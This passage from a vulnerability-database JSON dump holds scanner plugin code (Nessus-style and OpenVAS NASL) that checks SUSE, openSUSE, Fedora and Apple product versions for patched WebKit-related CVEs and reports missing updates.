(rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", 
reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-31T16:47:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-02-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852266", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852266\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-02-01 04:03:21 +0100 (Fri, 01 Feb 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0108-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00050.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0108-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.5 fixes the following issues:\n\n 
Security issues fixed:\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption\n (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\n CVE-2018-4464: Fixed multiple memory corruption issues with improved\n memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-108=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", 
rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:01", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates(HT209345)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814602", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814602", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes 
Security Updates(HT209345)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814602\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4437\", \"CVE-2018-4464\",\n \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 11:14:55 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple iTunes Security Updates(HT209345)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state 
management.\n\n - A logic issue was addressed with improved validation.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks and run arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209345\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nappVer = infos['version'];\nappPath = infos['location'];\n\nif(version_is_less(version:appVer, test_version:\"12.9.2\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"12.9.2\", install_path: appPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:26", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT209346)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", 
"CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814603", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT209346)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814603\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4437\", \"CVE-2018-4464\",\n \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 11:23:39 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple iCloud Security Updates(HT209346)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host 
is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks and run arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.9 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.9 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209346\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.9\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.9\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", 
"cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates(HT209344)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814601", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT209344)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814601\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4445\", \"CVE-2018-4437\",\n \"CVE-2018-4464\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\",\n \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 10:43:13 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple Safari Security Updates(HT209344)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - 'Clear History and Website Data' did not clear the history.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks, arbitrary code execution and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 12.0.2\");\n\n 
script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 12.0.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209344\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\", \"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif((!osName && \"Mac OS X\" >!< osName) || !osVer){\n exit (0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.12.6 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.13.6 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(osVer == \"10.14\")\n{\n fix = \"Upgrade Apple Mac OS X to version 10.14.1 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\n\nelse\n{\n if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\n safVer = infos['version'];\n safPath = infos['location'];\n\n if(version_is_less(version:safVer, test_version:\"12.0.2\"))\n {\n fix = \"12.0.2\";\n installedVer = \"Apple Safari \" + safVer ;\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:installedVer, fixed_version:fix, install_path:safPath);\n security_message(data:report);\n 
exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873226", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9d572cc64a_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873226\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:36:34 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 